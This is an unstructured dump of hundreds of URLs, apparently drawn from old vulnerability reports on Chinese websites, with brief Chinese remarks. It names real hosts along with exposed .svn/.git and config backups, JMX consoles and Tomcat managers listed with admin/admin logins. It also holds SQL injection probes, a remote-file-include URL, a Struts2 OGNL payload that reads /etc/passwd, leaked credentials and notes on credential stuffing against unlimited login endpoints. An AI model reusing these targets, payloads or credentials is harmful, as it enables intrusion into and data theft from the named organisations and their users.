http://211.84.163.240:8080/opac/getCollection?libId= http://113.247.235.133:8081/opac/getCollection?libId= http://library.cnuschool.org.cn:8080/opac/getCollection?libId= http://mcloud.kingdee.com/mcloud/pages/ http://mcloud.kingdee.com http://mcloud.kingdee.com/mcloud/pages/ string:340727 string:340727 user:reference:c0-e1 pwd:reference:c0-e2 https://github.com/digpads/Web/blob/bb74cd1950379cc431082e0811bafb2cffd6a98d/demo/zhanghao.txt https://github.com/huoshaoyun/wedding_web(文件放到web目录下) http://112.124.46.39:8081/web/wap/appdown.html https://github.com/huoshaoyun/hunliji_spring hammerhead:/system http://oa.ayinfo.cn http://car.weimaiche.cn/xiamen/neiye.php?id=4 http://www.goldlib.com.cn/ http://211.84.163.240:8080/opac/getClassNumberTree?id=1 http://210.26.83.207:8001/opac/getClassNumberTree?id=1 http://210.27.181.211/opac/getClassNumberTree?id=1 http://114.242.187.29:8080//opac/getClassNumberTree?id=1 http://113.247.235.133:8081//opac/getClassNumberTree?id=1 http://www.hunliji.com/exhibit?search= http://www.mfff.org.cn/view_zs.jsp?id=182 http://www.cxtuku.com/.svn/entries http://60.28.205.41:8280/shouji/admin.htm http://bk.hunliji.com http://bk.hunliji.com http://tool.w3cschool.cc/languages/online.php?language=python ps:shell已经删除,未深入 http://agent.189-3g.com:80/ http://bbs.uc.cn http://www.163.com http://m.qfpay.com/wp-login.php http://m.qfpay.com/wp-content/plugins/hello.php http://www.itophome.com http://www.itophome.com:80/ http://www.itophome.com/usermanage.aspx?flag=7&uid=11 www.itophome.com http://220.181.79.17/webmail/ http://220.181.79.17/webmail/.svn/entries http://www.jenomc.com/search.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.123.cc/123.txt http://bbs.lznews.cn//config/config_global.php.bak http://121.40.89.44/ http://www.infojiading.cn/ http://jy.esu.edu.cn/ActivityList.asp?TactiID=5 http://job.sicfl.edu.cn/ActivityList.asp?TactiID=29 http://job.shmtu.edu.cn/ActivityList.asp?TactiID=124 http://jiuye.sbs.edu.cn/ActivityList.asp?TactiID=13 http://jy.shutcm.edu.cn/ActivityList.asp?TactiID=37 http://job.sicfl.edu.cn/zyjs.asp?Txy=18&tzy=10 http://job.xq.sh.cn/zyjs.asp?Txy=12&tzy=15 http://job.shmtu.edu.cn/zyjs.asp?Txy=8&tzy=14 http://career.sdju.edu.cn/zyjs.asp?Txy=11&tzy=12 http://jy.esu.edu.cn/zyjs.asp?Txy=18&tzy=10 http://**.**.** gms.zufangzi.com/gms/getfile/pdf/contract/20150304/PEK10001523.pdf?orderItemId=1534&contractId=202&agentId=1679 http://58.56.128.81:8080/ https://passport.alipay.com/mini_login_check.js?callback=jQuery17205112576861865819_1430734520188&site=1&_input_charset=utf-8&ctoken=dzUY3ljC9CvBo4wGz1jzaemAHxS7PR&_=1430734529099 https://passport.alipay.com/mini_login_check.js?callback=xxxxxx&site=1 http://doc.vlinkage.com/phpinfo.php http://base.vlinkage.com/phpinfo.php http://lyzbj.com/plus/hongfeng.php http://service.shopex.cn/.svn/entries http://my.shopex.cn/.svn/entries http://service.shopex.cn/.svn/entries http://www.shfato.com/english/cer1.asp?id=22 http://113.106.236.12:8000/portal/login_init.action http://221.206.40.103/portal/login_init.action http://www.yodo1.com.cn/.git/config https://github.com/SiQLuxe/Snapshot/blob/c6a532699920ca4de6f8342cc25aa881dde64dd0/mytrash/hdp/runJob.sh http://cnsz131084.app.paic.com.cn:8080/oozie http://CNSH041567.app.paic.com.cn:8080/oozie http://hdp-oozieserver-prd.app.paic.com.cn:8080/oozie Dheader:j_username=V_PA011_HADOOP_CORE Dheader:j_password=${j_password https://github.com/SiQLuxe/Snapshot/blob/c6a532699920ca4de6f8342cc25aa881dde64dd0/network/proxy/PAC/proxyforwebx.pac http://passport.aplusapi.pptv.com/regandlogin_pay_vip/registerandlogin.html?error=%E7%94%A8%E6%88%B7%E5%90%8D%E4%B8%BA%E7%A9%BA%E6%88%96%E8%80%85%E7%94%A8%E6%88%B7%E4%B8%8D%E5%AD%98%E5%9C%A8&username=bklm1&action=login&jscall=redirect http://wms.fday.co/未授权访问 site:fday.co http://wms.fday.co/checkin/stat/by_item http://wms.fday.co/checkin/stat/by_item/export http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://co-diovan.medlive.cn/?m=academic&c=video&id=30 http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://www.canzhuowang.cn/member/order?id=1 http://admin.canzhuowang.cn/admin.php后台存在SQL注入,路径暴露 http://klmywxzj.klmy.gov.cn/logInit.action http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org https://wsc.sptcc.com/sptcc/index/tologin!init http://qdslyy.qdslyy.cn/Admin/login.aspx?ReturnUrl=%2fadmin%2findex.aspx http://web.7k7k.com/codes/get.php?pid=1 http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://222.222.120.20:81/geosite/ www.to-dream.com拓之林网络营销顾问,该公司的cms存在后台权限绕过漏洞,使用万能密码admin http://www.to-dream.com/manage/index.aspx http://bj.crland.com.cn/manage http://www.guofengmeitang.com/manage http://www.bcegre.com.cn/manage/login.aspx http://www.sycrland.com/manage/login.aspx http://www.dongrun.com.cn/manage/login.aspx http://cnb.nlc.gov.cn http://www.1337day.com/exploit/23480 url:http://agentclub.hnair.com/ http://a.fangdamai.com http://189.etao189.com/main.jhtml http://soft-sk.yonyou.com/news/more.jsp?boardbh=implementthink http://bj.crland.com.cn/ http://bj.crland.com.cn/manage/后台登陆框post注入,抓包sqlmap跑 http://sqlmap.org http://news.appapi.zjol.com.cn/ZJonline/admin/ http://i.kesion.com/ http://i.kesion.com/ http://i.kesion.com/user/index.aspx http://www.maiguo01.com/team.php http://www.maiguo01.com//admin/kindeditor/attached/flash/20150504/20150504234645_33420.swf/1.php http://220.161.90.230:2011/ http://61.156.217.133:2011 http://szkin.8866.org:2011/ http://58.47.159.72:2011 http://mtc.f3322.net:2012 http://mtyd.f3322.net:2012 http://120.26.43.95:4000 http://www.googosoft.com/ http://211.67.63.14/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.69.16.30/dxyq//zfcgFrame/xx_look.aspx?ID=1 http://210.31.141.73/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.64.120.53/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.67.112.115/dxyq//zfcgFrame/xx_look.aspx?ID=1 http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/journal_guide?inital=N&marc_type=1&tag=journal_guide&subtag=subletter http://113.247.235.133:8081/opac/journal_guide?inital=P&marc_type=1&tag=journal_guide&subtag=subletter http://114.242.187.29:8080/opac/journal_guide?inital=Q&marc_type=1&tag=journal_guide&subtag=subletter http://211.84.163.240:8080/opac/journal_guide?inital=N&marc_type=0&tag=journal_guide&subtag=subletter http://library.cnuschool.org.cn:8080/opac/journal_guide?inital=C&marc_type=1&tag=journal_guide&subtag=subletter http://mygoodbaby.gb246.com/robots.txt一瞅。dedecms http://web.7k7k.com/phone/h.php?id= http://www.gddygs.com/invoker/JMXInvokerServlet http://www.younglight.com.cn/invoker/JMXInvokerServlet http://www.gdnxfd.com/invoker/JMXInvokerServlet http://www.ticket-easy.cn/invoker/JMXInvokerServlet http://demo.yxcms.net/ http://www.lesuzhou.com/index.php http://www.k3led.cn/led/index.php http://qy002.demo.jz004.com/index.php http://www.sscproxy.com/index.php http://www.cctv1949.com/index.php http://jkpt.jlsafety.gov.cn http://bec.pigai.org/ http://bec.pigai.org/index.php?bmsg=Z4lx http://www.tuyou.com/ http://oa.cupl.edu.cn/logs/login.log http://www.mama.cn/ask/q5784057-p1.html http://apcc2.com/qualifications.aspx?oid=000e7f69-0000-0002-0000-00002a638e70 http://apcc2.com/list.aspx?oid=000e7f69-0000-000d-0000-00002a6b5a7d http://apcc2.com/PartNodeDetail.aspx?oid=0008f2a5-0000-0000-0000-0000015ac6d3 http://apcc2.com/news_show.aspx?oid=00037db4-0000-0000-0000-00001cd4cf6a http://apcc2.com/newslist.aspx?oid=000f7374-0000-0000-0000-000001535e35 http://apcc2.com/speciallistall.aspx?oid=00131d97-0000-0000-0000-00009bb37c07 http://apcc2.com/project.aspx?oid=000fcad5-0000-0000-0000-00009fc017ce http://apcc2.com/Speciallist.aspx?oid=00131d97-0000-0005-0000-00009bb611d4 http://apcc2.com/qualifications_show.aspx?oid=0 http://apcc2.com/business.aspx?oid=00098196-0000-0009-0000-000001bfa613 http://apcc2.com/honours.aspx?type=%E5%9B%BD%E5%AE%B6%E7%BA%A7 http://lld.caca118114.com/Default.aspx inurl:topiccode= http://www.loca.hk/news.php?id=17 http://www.loca.hk/admin/adminindex.php https://218.29.130.242/ http://121.8.226.124:8080 http://ichuguo.chinadaily.com.cn/gallery/index/gid/10 http://www.zhixingche.me/user/login http://topic.chinadaily.com.cn/index/special/sid/698 http://222.247.54.157/ http://yn.bnet.cn/ http://42.96.201.175/jianwei_new/,发现有目录列表 http://42.96.201.175/jianwei_new/index.php/Public/login http://42.96.201.175/jianwei_new/upload/,我随便查看下2014年6月份的信息 http://oa.tcl.com/nulljsp.jsp http://www.xilaikd.com/xilaikd/login.jsp shell:http://www.xilaikd.com/xilaikd/upload/bak.jsp http://ioa.hisense-plaza.com/nulljsp.jsp http://ichuguoimage.chinadaily.com.cn/video/detail/vid/8284724 http://www.bjppb.gov.cn/ http://123.127.133.25/enterpriseInfowaiwang_findAllEnterpriseInfowaiwang.action http://tv.credithc.com/index.php?m=bosstv&c=LoginBoss&a=dologin http://z.yirendai.com/.svn/entries http://www.dtnews.cn/ http://www.dtnews.cn/gallery/gallery.aspx?cid=394166 http://www.dtnews.cn/c/shownews/one.asp http://www.yfxd.com.cn/ http://www.yfxd.com.cn:81 http://www.dswjcms.com/ index.php/Site/page/id/1.html http://manage.hxbank.biz/index.php/Site/page/id/21 http://www.jucash.cn/index.php/Site/page/id/13 http://www.u1touzi.com/index.php/Site/page/id/34.html http://www.yichengjr.com/index.php/Site/page/id/1.html http://www.ynhdd.com/index.php/Site/page/id/35.html http://erm-kbs.ruc.edu.cn/Ext/GetImage.ashx?t=thumb&id=69bdffc7-3eff-487e-81a4-f120980bd97b http://youhui.51credit.com/.svn/entries http://banks.51credit.com/.svn/entries http://m.feiniu.com http://m.hongkongairlines.com/ci/index.php/annual/annual_detail?annual_contact_id=&bi.mi=null&bimi=null&memberId=null&uuidctoke=88e50c89c00e0550833fa6e03e81956d_EN&yearTicketCode=1 http://tg2.883wan.com/.svn/entries http://www.gzs.com.cn官网里面有个网上营业厅, https://wt.gzs.com.cn/servlet/user/LoginAction https://wt.gzs.com.cn/servlet/user/LoginAction https://pm.jx.chinaccs.cn:20808/jmx-console/ https://pm.sn.chinaccs.cn:20806/jmx-console/ http://42.123.72.166:8080/mx-console/ http://42.123.72.171:8080/mx-console/ http://42.123.72.148:8080/mx-console/ http://42.123.72.178:8080/mx-console/ https://pm.jx.chinaccs.cn:20808/jmx-console/为例 http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1 http://bbs.zgzcw.com//config/config_global.php.bak https://www.yonyoufinancial.com http://www.waitalone.cn/phpcmsv9-poster_click-injection-exp.html http://m.feiniu.com http://web.mail.tom.com/webmail/login/index.action?from_domain=web.mail.tom.com www.991168.com www.991168.com http://tangyuan.tom.com/login.php可以看到没有任何登陆限制 http://site.jxt189.com/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content http://www.sbk2000.com/Client_list.aspx http://218.199.208.30/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://lab.scuec.edu.cn/ServerManager/Platform_content.aspx?id=10&Action=OAMessage http://210.42.171.27/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://sbgl.htu.cn/sbk8/Platform_content.aspx?id=3&Action=OAMessage http://119.97.240.106:9999/Platform_content.aspx?id=3&Action=RulesMessage http://zichan.xnec.cn:10002/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://210.42.255.109/sbk8/Platform_content.aspx?id=10&Action=OAMessage http://game.chinaiiss.com/.svn/entries http://www.daimayi.com/index.php/Apply/get_census?code= http://think.lenovo.com.cn:80/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:81/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:82/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:88/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:88/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:90/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8001/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8080/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8081/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8082/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8088/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8090/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8888/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:9000/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:9090/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://api.kd.yintai.com/api.kd.yintai.com.rar sim.yintai.com/web.rar news.yintai.com/web.zip about.yintai.com/about.rar https://60.190.224.20:8443/tellin/opr/baseline/login.do?CLS=OPR&UITRANSFER=servicekey:0 https://60.190.224.20:8443/tellin/usr/uap/uaplogin.do?CLS=USR&UITRANSFER=servicekey:296 https://60.190.224.20:8443/jmx-console/ http://www.kssl.gov.cn/sitecilent/imglist.aspx?infotype=slfjq url:http://202.96.124.89:8080/webclient/ http://202.96.124.89:8080/webclient/user/login.action jboss-4.2.3.GA/server/default/./tmp/deploy/tmp5396928387299354540webclient-exp.war/ https://github.com/cloudbian/MSG_CENTER/blob/12191d0faf63c563751f442e827dfe5d7a54fc69/MsgCenter/src/com/bjj/resources/props/application.properties http://58.246.134.82:1550/PayProxy/alipayforwebCallBack http://58.246.134.82:1550/PayProxy/alipayForWapCallBack https://www.yeepay.com/app-merchant-proxy/command.action http://58.246.134.82:1550/PayProxy/yeePayforonlineCallback https://www.yeepay.com/app-merchant-proxy/node http://58.246.134.82:1550/PayProxy/kqbillCallback http://203.110.164.10:8888/sms.aspx http://qym.bingdian.com/ www.ipeen.com.tw http://218.242.168.130:8080/sfgc/ http://218.242.168.130:8080/zmeu/zmeu.jsp http://aboutus.cits.cn/travel/login.jsp www.jiayuan.com&new_header=1&channel=index http://www.jiayuan.com http://cget.zjwq.net/ url:http://121.42.44.246:8888/manager/html user:admin pass:admin http://www.tjpme.com:80/ www.tjpme.com url:http://221.207.32.166:8888/manager/html user:admin pass:admin http://221.207.32.166:8888/qhgjjSystem/login.action http://221.207.32.166:8888/systemManager/doLogin.action http://223.202.59.132/,可查看该公司天津机房监控的总流量信息; url:http://210.83.225.142:8888/manager/html user:admin http://210.83.225.142:8888/ http://210.83.225.142:8888/qdjm/menu/SelectMain.action# http://210.83.225.142:8888/qdjm/menu/SelectMain.action http://218.80.228.12:8080/irp/login.seam;jsessionid=31518AE572429350488F92441BF9E313?cid=2733 http://m.110.com/login/ url:http://125.71.28.78:8888/manager/html user:admin pass:admin http://baiyehao.yiji.com/product/productSearch.do http://baiyehao.yiji.com/product/productSearch.do url:http://220.248.226.85:8888/manager/html user:tomcat pass:tomcat http://sso.cqpost.com/normal/main.jsp url:http://121.28.83.210:8888/manager/html user:admin http://121.28.83.210:8888/mvnforum/mvnforum/logout meeting.cthy.com/booking/?rid=81 url:http://125.64.91.74:8888/manager/html user:admin pass:admin http://202.109.145.148:8888/wooyun/ http://101.227.68.206/home/login http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/invoker/JMXInvokerServlet拿到getshell http://www.kugou.com/openplat/kugou/index.php?r=oauth/login&client_id=201404018624&redirect_uri=http%3A%2F%2Fgdhg.kugou.com%2FloginCallback.php&code=3da4e18ab25146fa9e09b7397277c52d&time=1397012685&wap=0这个接口,可以看到没有任何登陆限制,一开始找了一个接口,也是没有任何登陆限制,然后撞库好久才发现跳出来了限制坑大了。。这个接口测试之后是没有任何限制的 http://www.diandian.com/login这个接口,也就是点点博客的主站登陆接口,可以看到这个登陆接口是没有任何限制的 http://emp.cnpc.com.cn/ http://emp.cnpc.com.cn/ http://iptv.cnpc.com.cn/ http://iptv.cnpc.com.cn/phpinfo.php http://iptv.cnpc.com.cn/administrator/index.php http://mms.cnpc.com.cn:8080/mms4.3.3/login.jsp http://fex.baidu.com/ueditor/#server-django http://218.57.131.146/caigou/NoticeList.aspx?Type=1%27 http://webop.gfan.com https://member.niwodai.com btg.com.cn/******,huoyan@btg.com.cn/****** https://passport.mafengwo.cn http://user.syyx.com/login.aspx这个接口,可以看到是有验证码限制的,但是经过测试之后发现这个验证码是只要输入正确一次就可以一直正确,验证码形同虚设 http://www.jsychrss.gov.cn/msg.php?id=26674 Payload:http://www.jsychrss.gov.cn/msg.php?id=26674'%20and%20'1'='1 http://www.jsychrss.gov.cn/msg.php?id=26674'%20and%20'1'='2 http://www.jsychrss.gov.cn/list.php?zt_type=108000000000000 http://www.jsychrss.gov.cn/nm_show.php?id=18632 http://www.jsychrss.gov.cn/nm_c_show.php?id=26662 http://vb.vlinkage.com http://www.xunyee.cn http://www.xunyee.cn http://vp.vlinkage.com http://vp.vlinkage.com/app/config se-extension://ext-1977427434/popup.html http://apixy.zuiyouxi.com:8800/admincp/admin/loginUser/ http://www.changlingauto.com/Default.asp?p_code=a http://120.136.171.179:8080/cas/login http://120.136.171.179:8080/jmx-console http://www.vpclub.cn http://www.yiii.net/product/online.html,选择一个在线测试的样本,这里选择163魔板的,其他的一样。 http://old.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=3595 http://101.227.253.92:8080/edu/ http://101.227.253.92:8080/edu/login!login.do http://101.231.52.2:8888/login/Login.jsp?logintype=&gopage=&languageid=7&message=18 http://101.231.52.2:8888/login/VerifyLogin.jsp http://101.231.52.2:8888/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&languageid=7&message=17 https://donkey.cc.ncu.edu.tw/~training/bin/class.php?id=18 http://tms.jiuxian.com/Account/Login http://www.lzjszj.com/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=3&CDID2=2&WSMID=3&WEBMID=3 http://www.gzsjsjc.com/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=52&CDID2=2&WEBMID=4 http://125.46.87.55/zz_xhtsys/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=83&CDID2=2&WSMID=162&WEBMID=162 http://www.bhjczx.cn/web/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=132&CDID1=2&WSMID=226&WEBMID=10 http://www.esceqs.com.cn/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=93&CDID2=2&WSMID=200&WEBMID=183 http://www.lygczl.cn/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=79&CDID2=2&WSMID=1&WEBMID=1 http://222.29.253.58:8080/manager/html http://museum.ruc.edu.cn/admin/ftb.imagegallery.aspx http://io.ruc.edu.cn/modules/mod_news_show_gk3/style/style.php http://202.112.118.46/ywcdwz/zxdt2.jsp?zxdt_id=9 http://www.365pp.com/Member/Setting/UserAddress http://www.365pp.com/Member/Trade/OrderDetail?orderid=%27 https://101.231.40.234/ http://www.vpclub.cn/login/index http://user.syyx.com/login.aspx昨晚发现的这个接口有验证码但是可以绕过限制,昨天晚上太困了没撞库只爆破了一下证明就睡觉去了,这是游戏网站不撞库出来点游戏装备或者rmb账户啥的不甘心啊,早上6点多就醒了(好久没醒这么早了),起床后开电脑找了找终于又被我找到了一个接口:http://nycs.jbl.syyx.com/login.aspx?serverid=110 http://oa.yhdtv.com.cn/login.aspx?action=logout http://gl.sxxw.net/Admin/index.php/Public/login http://gl.sxxw.net/Admin/index.php/Floor/add/ http://218.22.66.214:8088/search_wh.aspx http://218.22.66.214:8088/,竟然存在目录列表漏洞 https://github.com/love-somnus/smart-batch/blob/b3a840a3df0120d533d6c150aaebcbc9d55d1a88/src/main/resources/env/batch-dev.properties http://eduapp.dahe.cn/toupiao/e/member/login/这个接口,也是大河网站旗下的一个站点,可以看到登陆接口没有任何限制 http://wooyun.org/bugs/wooyun-2010-0108219 pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7 http://58.215.139.37:9200/_search?pretty www.lillyoncology.com.cn","time_add":"2015-03-11 www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg www.sunflowerclub.com.cn","time_add":"2015-03-11 www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg www.huadong.cn","time_add":"2015-03-11 www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg www.niwodai.com","time_add":"2015-03-11 www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463 www.louisfenysh.com","time_add":"2015-03-11 www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156 www.huadong.net.cn","time_add":"2015-03-11 www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg http://git2.qingtingfm.com//public/projects http://wooyuntest.net3v.net http://monitor.cloud.chinacache.com/admin/ http://monitor.cloud.chinacache.com/ipmonitor/vm_console http://www.duimian.cn/ucenter/uaddress http://114.80.155.61:8080/pos/spif/login.jsp http://114.80.155.61:8080/admin-console http://www.nongyou.com.cn/ http://jwh.tanljgzx.gov.cn/newsymItemView/Item1.aspx?id=021973 http://218.56.99.84:8003/newsymItemView/Item1.aspx?id=066968 http://222.135.109.70:8200//newsymItemView/Item1.aspx?id=021973 http://123.134.189.60:8022//newsymItemView/Item1.aspx?id=021973 http://218.56.40.229:8037//newsymItemView/Item1.aspx?id=021973 http://jwh.tanljgzx.gov.cn/ckq/szglview.aspx?id=3940 http://218.59.205.41:8053/ckq/szglview.aspx?id=3940 http://218.59.205.41:8053/ckq/szgllistview.aspx?tname=%E7%8E%8B%E5%BA%84%E9%95%87&CountryName=%E5%8D%97%E5%B0%9A%E4%B8%9C http://jwh.tanljgzx.gov.cn//ckq/szgllistview.aspx?tname=%E7%8E%8B%E5%BA%84%E9%95%87&CountryName=%E5%8D%97%E5%B0%9A%E4%B8%9C http://work.ch.gongchang.com/login.html http://p.dahe.cn/index.php?r=user/login这个接口,是大河网站的一个分站登陆接口,可以看到登陆地方没有任何限制 http://wmcrm.baidu.com/ http://www.wanshe.cn/login/toGet_password www.wanshe.cn https://member.meizu.com http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33* http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33* http://218.108.48.210/kucun/login.php http://mail.10086.cn http://114.80.217.165:8080/XWSpnetWai/share/login/pages/Login.jsp http://114.80.217.165:8080/jmx-console/ http://star.cms.qingting.fm/ url:http://sso.cqpost.com/normal/main.jsp http://weibotest.gfan.com/dz/ inurl:http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo= http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo=805072014370397001779&insuranceType=0&identifyNumber=79270613-1&addressCode=37000000&printNo=undefined&insuranceName=undefined http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo=805072014330212003938&insuranceType=0&identifyNumber=05509836-7&addressCode=33020000&printNo=undefined&insuranceName=undefined http://210.31.114.125/kfWeb/admin/admin_adminmodifypwd.aspx http://www.lzc.com.cn/ http://**.**.**/edoas2/login.jsp http://cms.qingting.fm/ http://sports.cms.qingting.fm/ http://www.qzdatasoft.com/ http://jw.jzu.edu.cn/jiaowu/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jiaowu.jljcxy.com/jiaowu/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jiaowu.tedazj.com/jiaowu/jwgl//LoginCheck4.asp?LoginLb=jwc&Account=1 http://111.177.117.72/jiaowu_xflg/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jwgl.cqeec.com/jiaowu_2008/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 https://www.tuandai.com/ajaxCross/Login.ashx www.tuandai.com http://222.78.53.226/LpInfo/nm_4_155.html?dtid=587&fwUse=%E5%BA%97%E9%9D%A2 http://tstz.fdc.cn/LpInfo/nm_4_211.html?dtid=&fwUse=%E8%BD%A6%E4%BD%8D http://www.dsfgj.cn/LpInfo/nm_4_326.html?dtid=&fwUse=%E5%95%86%E5%9C%BA http://ptjs.zzjs.cn/LpInfo/nm_4_148.html?dtid=1119&fwUse=%E5%95%86%E4%BD%8F%E6%A5%BC http://www.tstzfdc.gov.cn/LpInfo/nm_4_161.html?dtid=666&fwUse=%E8%BD%A6%E5%BA%93 http://www.xcola.com.cn/ http://222.73.136.205/ http://115.29.221.110/ http://210.13.199.11/ http://118.144.36.61/ http://221.8.23.119/jyb-zhongzhi/ http://login.alpha.p7game.com/index/passportLogin/USER/PASS http://bbs.zol.com.cn/dcbbs/d232_760115_8.html http://drops.wooyun.org/tips/689 http://bbs.zol.com.cn/dcbbs/d17_54716_16.html http://git.social-touch.com/public http://old.jiajia.me/login这个登陆接口是老版的,一开始我进的是新版的登陆接口,但是我看的新版的那个登陆接口是有验证码限制,没有试可不可以绕过直接就到了这个接口,发现这个接口是没有任何登陆限制的,果然老版安全做的不如新版好 http://weixin.51web.com/LoginAction!logout.action这个接口是成都世纪东方微信公众平台管理的登陆接口,打开后看到是有验证码限制的 http://www.jlsbdsystem.com/ http://111.12.219.18/Login.aspx http://jingzhi.jd.com/中的消息处,用户能够越权删除其他用户的消息,而且是get,fuzz都能够删除完整站用户的消息 http://wap.kaixin001.com/auth/?appkey=4981162124136a074769f1078676fdb2&flag=2&_email=bklm11&display=&iswebgame=0&from=kx&callback=http%3A%2F%2Fapi.kaixin001.com%2Foauth2%2Fauthorize%3Fclient_id%3D4981162124136a074769f1078676fdb2%26response_type%3Dcode%26scope%3Dbasic+friends_records+user_education+user_career+send_sysnews+create_records%26state%3Da79df608262f06cac21c8166733ecb65c09a1f5f%26redirect_uri%3Dhttp%253A%252F%252Fm.dajie.com%252Faccount%252Fkx%252Fcallback%253Fcb%253D0%26oauth_client%3D1%26display%3Dmobile%26tmp%3D1%26oauth_client%3D1&return=&isoauth=1 http://www.sem-cms.com/ http://www.themenunique.com/N_view.asp?nid=2 http://www.qdlmesh.com/N_view.asp?nid=15 http://www.minrida.com/N_view.asp?nid=113 http://www.keytron.com.hk/N_view.asp?nid=16 http://sevistec.com/N_view.asp?nid=11 http://www.sem-cms.com/ http://www.yikai-auto.com/clkj_admin/upfile.asp http://progloballight.com/clkj_admin/upfile.asp http://www.1dragon.net/clkj_admin/upfile.asp http://www.stdfled.com//clkj_admin/upfile.asp http://www.apexcool.com/clkj_admin/upfile.asp http://passport2.chaoxing.com/register3?refer=http%3A%2F%2Fi.mooc.chaoxing.com http://ir.moxian.com http://yxhk.mxcms.moxian.com http://customer.yxhk.moxian.com http://ir.moxian.com http://ptr.chaoxing.com/coursecontroller/factors?newCourse=true http://admin.tuchong.com data.zjepi.net/ZheJiang/systemsetting/userLogin.action_ http://**.**.**/YangZhou/__ http://**.**.**/RiZhao/_ http://**.**.**/DeZhou/_ http://**.**.**/HeZe/_ http://**.**.**/LiaoCheng/_ http://**.**.**/LaiWu/_ http://**.**.**/BinZhou/_ http://**.**.**/loginAction!login.action;jsessionid=28048FFB8F1DC457070CFC24BF6D185B http://219.143.38.248/paycenter/ http://219.143.38.248/DeliveryCenter/login.do?email= http://sharpshooter.yesky.com/userAction_toLogin.action IP:219.239.88.230 Port:11211 http://ad.zuiyouxi.com http://zdq.zuiyouxi.com http://my.webluker.com/user/check_port/ http://act.duimian.cn/login/submit http://120.236.40.70/ http://120.236.40.72/ http://120.236.40.76/ http://120.236.40.69/ http://120.236.40.75/ http://120.236.40.73/ http://120.236.40.77/ http://trade.315.com.cn/web/tradeAction_industryUI.html?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 